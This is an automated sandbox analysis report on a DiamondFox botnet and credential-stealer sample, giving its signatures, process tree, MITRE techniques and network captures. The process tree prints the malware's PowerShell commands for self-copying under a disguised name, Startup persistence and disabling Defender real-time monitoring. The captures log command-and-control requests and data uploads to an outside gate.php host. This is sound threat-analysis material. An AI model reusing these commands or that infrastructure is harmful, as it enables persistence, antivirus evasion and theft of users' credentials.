diamondfox | 63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a

Analysis

max time kernel
148s
max time network
147s
platform
windows10_x64
resource
win10v20201028
submitted
19/01/2021, 18:09 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe
Size

579KB
MD5

de4b296cb2891bd1c3ed085ed648a62d
SHA1

73aaa5d6869bd25abb78ba5beb27ec8c5ee71e57
SHA256

63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a
SHA512

122402092f03e9ee35ad0fa5128e4d50795894790f088918d0ca3f6e128d85c8b6b7f64eaecdf6d66b2a8d41f921a1446056129d7b9eb28822afb8eacb20d453

Score

10^/10

diamondfox botnet spyware stealer

Malware Config

Signatures

DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
botnet stealer diamondfox

DiamondFox payload 1 IoCs

Detects DiamondFox payload in file/memory.

resource	yara_rule
behavioral2/memory/972-3-0x0000000000400000-0x0000000000470000-memory.dmp	diamondfox

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/2136-82-0x0000000000400000-0x0000000000477000-memory.dmp	WebBrowserPassView
behavioral2/memory/2136-83-0x0000000000447D8A-mapping.dmp	WebBrowserPassView
behavioral2/memory/2136-85-0x0000000000400000-0x0000000000477000-memory.dmp	WebBrowserPassView

Nirsoft 6 IoCs

resource	yara_rule
behavioral2/memory/2136-82-0x0000000000400000-0x0000000000477000-memory.dmp	Nirsoft
behavioral2/memory/2136-83-0x0000000000447D8A-mapping.dmp	Nirsoft
behavioral2/memory/2136-85-0x0000000000400000-0x0000000000477000-memory.dmp	Nirsoft
behavioral2/memory/296-87-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral2/memory/296-88-0x0000000000413E10-mapping.dmp	Nirsoft
behavioral2/memory/296-90-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft

Executes dropped EXE 3 IoCs

pid	Process
3984	audiodg.exe
2136	audiodg.exe
296	audiodg.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiodg.lnk	powershell.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3984 set thread context of 2136	3984	audiodg.exe	90
PID 3984 set thread context of 296	3984	audiodg.exe	91

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	17	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
2092	powershell.exe
2092	powershell.exe
2092	powershell.exe
3868	powershell.exe
3868	powershell.exe
3868	powershell.exe
2296	Powershell.exe
2296	Powershell.exe
2296	Powershell.exe
2136	audiodg.exe
2136	audiodg.exe
2136	audiodg.exe
2136	audiodg.exe
296	audiodg.exe
296	audiodg.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	3868	powershell.exe
Token: SeDebugPrivilege	2296	Powershell.exe
Token: SeDebugPrivilege	296	audiodg.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
972	63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe
3984	audiodg.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 972 wrote to memory of 2092	972	63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe	76
PID 972 wrote to memory of 2092	972	63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe	76
PID 972 wrote to memory of 2092	972	63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe	76
PID 2092 wrote to memory of 3984	2092	powershell.exe	81
PID 2092 wrote to memory of 3984	2092	powershell.exe	81
PID 2092 wrote to memory of 3984	2092	powershell.exe	81
PID 3984 wrote to memory of 3868	3984	audiodg.exe	82
PID 3984 wrote to memory of 3868	3984	audiodg.exe	82
PID 3984 wrote to memory of 3868	3984	audiodg.exe	82
PID 3984 wrote to memory of 2296	3984	audiodg.exe	85
PID 3984 wrote to memory of 2296	3984	audiodg.exe	85
PID 3984 wrote to memory of 2296	3984	audiodg.exe	85
PID 3984 wrote to memory of 2136	3984	audiodg.exe	90
PID 3984 wrote to memory of 2136	3984	audiodg.exe	90
PID 3984 wrote to memory of 2136	3984	audiodg.exe	90
PID 3984 wrote to memory of 2136	3984	audiodg.exe	90
PID 3984 wrote to memory of 2136	3984	audiodg.exe	90
PID 3984 wrote to memory of 2136	3984	audiodg.exe	90
PID 3984 wrote to memory of 2136	3984	audiodg.exe	90
PID 3984 wrote to memory of 2136	3984	audiodg.exe	90
PID 3984 wrote to memory of 2136	3984	audiodg.exe	90
PID 3984 wrote to memory of 296	3984	audiodg.exe	91
PID 3984 wrote to memory of 296	3984	audiodg.exe	91
PID 3984 wrote to memory of 296	3984	audiodg.exe	91
PID 3984 wrote to memory of 296	3984	audiodg.exe	91
PID 3984 wrote to memory of 296	3984	audiodg.exe	91
PID 3984 wrote to memory of 296	3984	audiodg.exe	91
PID 3984 wrote to memory of 296	3984	audiodg.exe	91
PID 3984 wrote to memory of 296	3984	audiodg.exe	91
PID 3984 wrote to memory of 296	3984	audiodg.exe	91

C:\Users\Admin\AppData\Local\Temp\63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe
"C:\Users\Admin\AppData\Local\Temp\63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:972
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell Copy-Item -Path 'C:\Users\Admin\AppData\Local\Temp\63dac056d672b1987462b41f44987cb470e5b94fd528e521040e98c70de2732a.exe' -Destination 'C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe';Start-Sleep -s 60;Start-Process 'C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2092
- - C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe
    "C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3984
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell $shell = New-Object -ComObject WScript.Shell;$shortcut = $shell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiodg.lnk');$shortcut.TargetPath = 'C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe';$shortcut.Save()
      4⤵
      Drops startup file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3868
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
      Powershell Set-MpPreference -DisableRealtimeMonitoring 1
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2296
  - - C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe
      /scomma C:\Users\Admin\AppData\Local\gadoiud\1.log
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:2136
  - - C:\Users\Admin\AppData\Local\gadoiud\audiodg.exe
      /scomma C:\Users\Admin\AppData\Local\gadoiud\2.log
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:296

Network

DNS

ip.seeip.org

Remote address:

8.8.8.8:53

Request

ip.seeip.org

IN A

Response

ip.seeip.org

IN A

23.128.64.141
GET

https://ip.seeip.org/

audiodg.exe

Remote address:

23.128.64.141:443

Request

GET / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Keep-Alive: 300
Pragma: no-cache
Accept: text/plain
Accept-Charset: utf-8
Accept-Language: en-us,en;q=0.5
Cookie: 013d564d9cfb0c69
Referer: http://www.microsoft.com/
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ip.seeip.org

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 19 Jan 2021 18:11:01 GMT
Content-Type: text/plain
Content-Length: 12
Connection: keep-alive
strict-transport-security: max-age=31536000; includeSubDomains
DNS

www.microsoft.com

Remote address:

8.8.8.8:53

Request

www.microsoft.com

IN A

Response

www.microsoft.com

IN CNAME

www.microsoft.com-c-3.edgekey.net

www.microsoft.com-c-3.edgekey.net

IN CNAME

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

IN CNAME

e13678.dscb.akamaiedge.net

e13678.dscb.akamaiedge.net

IN A

2.21.41.70
DNS

cklecriversiounfiern.online

Remote address:

8.8.8.8:53

Request

cklecriversiounfiern.online

IN A

Response
DNS

ridebuterfabid.tech

Remote address:

8.8.8.8:53

Request

ridebuterfabid.tech

IN A

Response

ridebuterfabid.tech

IN A

5.101.218.70
GET

http://ridebuterfabid.tech/dimapan/gate.php?ct=1

audiodg.exe

Remote address:

5.101.218.70:80

Request

GET /dimapan/gate.php?ct=1 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Keep-Alive: 300
Pragma: no-cache
Accept: text/plain
Accept-Charset: utf-8
Accept-Language: en-us,en;q=0.5
Cookie: b63c12aec37f8818
Referer: http://www.microsoft.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
Host: ridebuterfabid.tech

Response

HTTP/1.1 200 OK

Date: Tue, 19 Jan 2021 18:11:31 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.6.39
X-Powered-By: PHP/5.6.39
Content-Length: 64
Connection: close
Content-Type: text/html; charset=UTF-8
POST

http://ridebuterfabid.tech/dimapan/gate.php

audiodg.exe

Remote address:

5.101.218.70:80

Request

POST /dimapan/gate.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Keep-Alive: 300
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/plain
Accept-Charset: utf-8
Accept-Language: en-us,en;q=0.5
Cookie: 5a34cdf5cf12bbbd
Referer: http://www.microsoft.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
Content-Length: 1980
Host: ridebuterfabid.tech

Response

HTTP/1.1 200 OK

Date: Tue, 19 Jan 2021 18:11:39 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.6.39
X-Powered-By: PHP/5.6.39
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
POST

http://ridebuterfabid.tech/dimapan/gate.php?a4e=202EA5D2DB3B

audiodg.exe

Remote address:

5.101.218.70:80

Request

POST /dimapan/gate.php?a4e=202EA5D2DB3B HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=084CDDC83285
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
Content-Length: 85579
Host: ridebuterfabid.tech

Response

HTTP/1.1 200 OK

Date: Tue, 19 Jan 2021 18:11:40 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.6.39
X-Powered-By: PHP/5.6.39
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8
GET

http://ridebuterfabid.tech/dimapan/gate.php?pl=1

audiodg.exe

Remote address:

5.101.218.70:80

Request

GET /dimapan/gate.php?pl=1 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Keep-Alive: 300
Pragma: no-cache
Accept: text/plain
Accept-Charset: utf-8
Accept-Language: en-us,en;q=0.5
Cookie: 085cf8e61a22d1b4
Referer: http://www.microsoft.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
Host: ridebuterfabid.tech

Response

HTTP/1.1 200 OK

Date: Tue, 19 Jan 2021 18:11:41 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.6.39
X-Powered-By: PHP/5.6.39
Content-Length: 44
Connection: close
Content-Type: text/html; charset=UTF-8
GET

http://ridebuterfabid.tech/dimapan/gate.php?p=1

audiodg.exe

Remote address:

5.101.218.70:80

Request

GET /dimapan/gate.php?p=1 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Keep-Alive: 300
Pragma: no-cache
Accept: text/plain
Accept-Charset: utf-8
Accept-Language: en-us,en;q=0.5
Cookie: 167124042029a331
Referer: http://www.microsoft.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
Host: ridebuterfabid.tech

Response

HTTP/1.1 200 OK

Date: Tue, 19 Jan 2021 18:11:42 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.6.39
X-Powered-By: PHP/5.6.39
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
GET

http://ridebuterfabid.tech/dimapan/gate.php?gpp=1

audiodg.exe

Remote address:

5.101.218.70:80

Request

GET /dimapan/gate.php?gpp=1 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Keep-Alive: 300
Pragma: no-cache
Accept: text/plain
Accept-Charset: utf-8
Accept-Language: en-us,en;q=0.5
Cookie: 2609bce0ee9485ff
Referer: http://www.microsoft.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
Host: ridebuterfabid.tech

Response

HTTP/1.1 200 OK

Date: Tue, 19 Jan 2021 18:11:44 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.6.39
X-Powered-By: PHP/5.6.39
Content-Length: 44
Connection: close
Content-Type: text/html; charset=UTF-8
POST

http://ridebuterfabid.tech/dimapan/gate.php?a4e=202EA5D2DB3B

audiodg.exe

Remote address:

5.101.218.70:80

Request

POST /dimapan/gate.php?a4e=202EA5D2DB3B HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=AED67A0C91D5
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
Content-Length: 447
Host: ridebuterfabid.tech

Response

HTTP/1.1 200 OK

Date: Tue, 19 Jan 2021 18:11:59 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.6.39
X-Powered-By: PHP/5.6.39
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8
GET

http://ridebuterfabid.tech/dimapan/gate.php?p=2

audiodg.exe

Remote address:

5.101.218.70:80

Request

GET /dimapan/gate.php?p=2 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Keep-Alive: 300
Pragma: no-cache
Accept: text/plain
Accept-Charset: utf-8
Accept-Language: en-us,en;q=0.5
Cookie: 8c982cfd54b12b1c
Referer: http://www.microsoft.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
Host: ridebuterfabid.tech

Response

HTTP/1.1 200 OK

Date: Tue, 19 Jan 2021 18:12:00 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.6.39
X-Powered-By: PHP/5.6.39
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
GET

http://ridebuterfabid.tech/dimapan/gate.php?gpp=2

audiodg.exe

Remote address:

5.101.218.70:80

Request

GET /dimapan/gate.php?gpp=2 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Keep-Alive: 300
Pragma: no-cache
Accept: text/plain
Accept-Charset: utf-8
Accept-Language: en-us,en;q=0.5
Cookie: 644584a2ae98143a
Referer: http://www.microsoft.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
Host: ridebuterfabid.tech

Response

HTTP/1.1 200 OK

Date: Tue, 19 Jan 2021 18:12:02 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.6.39
X-Powered-By: PHP/5.6.39
Content-Length: 44
Connection: close
Content-Type: text/html; charset=UTF-8

23.128.64.141:443

https://ip.seeip.org/

tls, http

audiodg.exe

1.1kB
3.8kB
11
10

HTTP Request

GET https://ip.seeip.org/

HTTP Response

200
2.21.41.70:80

www.microsoft.com

audiodg.exe

190 B
132 B
4
3
5.101.218.70:80

http://ridebuterfabid.tech/dimapan/gate.php?ct=1

http

audiodg.exe

600 B
454 B
5
4

HTTP Request

GET http://ridebuterfabid.tech/dimapan/gate.php?ct=1

HTTP Response

200
5.101.218.70:80

http://ridebuterfabid.tech/dimapan/gate.php

http

audiodg.exe

2.7kB
429 B
7
5

HTTP Request

POST http://ridebuterfabid.tech/dimapan/gate.php

HTTP Response

200
5.101.218.70:80

http://ridebuterfabid.tech/dimapan/gate.php?a4e=202EA5D2DB3B

http

audiodg.exe

88.4kB
1.8kB
64
40

HTTP Request

POST http://ridebuterfabid.tech/dimapan/gate.php?a4e=202EA5D2DB3B

HTTP Response

200
5.101.218.70:80

http://ridebuterfabid.tech/dimapan/gate.php?pl=1

http

audiodg.exe

600 B
434 B
5
4

HTTP Request

GET http://ridebuterfabid.tech/dimapan/gate.php?pl=1

HTTP Response

200
5.101.218.70:80

http://ridebuterfabid.tech/dimapan/gate.php?p=1

http

audiodg.exe

5.8kB
325.4kB
117
223

HTTP Request

GET http://ridebuterfabid.tech/dimapan/gate.php?p=1

HTTP Response

200
5.101.218.70:80

http://ridebuterfabid.tech/dimapan/gate.php?gpp=1

http

audiodg.exe

601 B
474 B
5
5

HTTP Request

GET http://ridebuterfabid.tech/dimapan/gate.php?gpp=1

HTTP Response

200
5.101.218.70:80

http://ridebuterfabid.tech/dimapan/gate.php?a4e=202EA5D2DB3B

http

audiodg.exe

994 B
430 B
6
5

HTTP Request

POST http://ridebuterfabid.tech/dimapan/gate.php?a4e=202EA5D2DB3B

HTTP Response

200
5.101.218.70:80

http://ridebuterfabid.tech/dimapan/gate.php?p=2

http

audiodg.exe

2.2kB
97.8kB
39
69

HTTP Request

GET http://ridebuterfabid.tech/dimapan/gate.php?p=2

HTTP Response

200
5.101.218.70:80

http://ridebuterfabid.tech/dimapan/gate.php?gpp=2

http

audiodg.exe

601 B
434 B
5
4

HTTP Request

GET http://ridebuterfabid.tech/dimapan/gate.php?gpp=2

HTTP Response

200

8.8.8.8:53

ip.seeip.org

dns

58 B
74 B
1
1

DNS Request

ip.seeip.org

DNS Response

23.128.64.141
8.8.8.8:53

www.microsoft.com

dns

63 B
230 B
1
1

DNS Request

www.microsoft.com

DNS Response

2.21.41.70
8.8.8.8:53

cklecriversiounfiern.online

dns

73 B
138 B
1
1

DNS Request

cklecriversiounfiern.online
8.8.8.8:53

ridebuterfabid.tech

dns

65 B
81 B
1
1

DNS Request

ridebuterfabid.tech

DNS Response

5.101.218.70

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/296-87-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/296-90-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/972-3-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/972-2-0x00000000021E0000-0x0000000002250000-memory.dmp

Filesize
448KB

Download
memory/2092-13-0x0000000008290000-0x0000000008291000-memory.dmp

Filesize
4KB

Download
memory/2092-14-0x00000000081B0000-0x00000000081B1000-memory.dmp

Filesize
4KB

Download
memory/2092-20-0x0000000009810000-0x0000000009811000-memory.dmp

Filesize
4KB

Download
memory/2092-21-0x0000000009870000-0x0000000009871000-memory.dmp

Filesize
4KB

Download
memory/2092-22-0x0000000009F40000-0x0000000009F41000-memory.dmp

Filesize
4KB

Download
memory/2092-23-0x000000000AAC0000-0x000000000AAC1000-memory.dmp

Filesize
4KB

Download
memory/2092-18-0x0000000008C50000-0x0000000008C51000-memory.dmp

Filesize
4KB

Download
memory/2092-17-0x0000000008BC0000-0x0000000008BC1000-memory.dmp

Filesize
4KB

Download
memory/2092-16-0x0000000008270000-0x0000000008271000-memory.dmp

Filesize
4KB

Download
memory/2092-27-0x0000000007543000-0x0000000007544000-memory.dmp

Filesize
4KB

Download
memory/2092-15-0x0000000008400000-0x0000000008401000-memory.dmp

Filesize
4KB

Download
memory/2092-19-0x0000000009920000-0x0000000009921000-memory.dmp

Filesize
4KB

Download
memory/2092-12-0x0000000007AA0000-0x0000000007AA1000-memory.dmp

Filesize
4KB

Download
memory/2092-11-0x0000000007542000-0x0000000007543000-memory.dmp

Filesize
4KB

Download
memory/2092-10-0x0000000007B80000-0x0000000007B81000-memory.dmp

Filesize
4KB

Download
memory/2092-9-0x0000000007540000-0x0000000007541000-memory.dmp

Filesize
4KB

Download
memory/2092-8-0x0000000005030000-0x0000000005031000-memory.dmp

Filesize
4KB

Download
memory/2092-7-0x0000000073730000-0x0000000073E1E000-memory.dmp

Filesize
6.9MB

Download
memory/2136-82-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2136-85-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2296-66-0x00000000096B0000-0x00000000096E3000-memory.dmp

Filesize
204KB

Download
memory/2296-55-0x0000000001320000-0x0000000001321000-memory.dmp

Filesize
4KB

Download
memory/2296-56-0x0000000001322000-0x0000000001323000-memory.dmp

Filesize
4KB

Download
memory/2296-60-0x0000000007F20000-0x0000000007F21000-memory.dmp

Filesize
4KB

Download
memory/2296-52-0x00000000725E0000-0x0000000072CCE000-memory.dmp

Filesize
6.9MB

Download
memory/2296-63-0x00000000083E0000-0x00000000083E1000-memory.dmp

Filesize
4KB

Download
memory/2296-73-0x00000000093C0000-0x00000000093C1000-memory.dmp

Filesize
4KB

Download
memory/2296-74-0x00000000097E0000-0x00000000097E1000-memory.dmp

Filesize
4KB

Download
memory/2296-75-0x000000007ED80000-0x000000007ED81000-memory.dmp

Filesize
4KB

Download
memory/2296-77-0x0000000001323000-0x0000000001324000-memory.dmp

Filesize
4KB

Download
memory/2296-78-0x0000000009920000-0x0000000009921000-memory.dmp

Filesize
4KB

Download
memory/2296-80-0x0000000009910000-0x0000000009911000-memory.dmp

Filesize
4KB

Download
memory/3868-50-0x0000000004F63000-0x0000000004F64000-memory.dmp

Filesize
4KB

Download
memory/3868-45-0x0000000004F62000-0x0000000004F63000-memory.dmp

Filesize
4KB

Download
memory/3868-44-0x0000000008CA0000-0x0000000008CA1000-memory.dmp

Filesize
4KB

Download
memory/3868-43-0x0000000004F60000-0x0000000004F61000-memory.dmp

Filesize
4KB

Download
memory/3868-40-0x00000000082B0000-0x00000000082B1000-memory.dmp

Filesize
4KB

Download
memory/3868-34-0x0000000072DA0000-0x000000007348E000-memory.dmp

Filesize
6.9MB

Download
memory/3984-29-0x0000000000530000-0x00000000005A0000-memory.dmp

Filesize
448KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.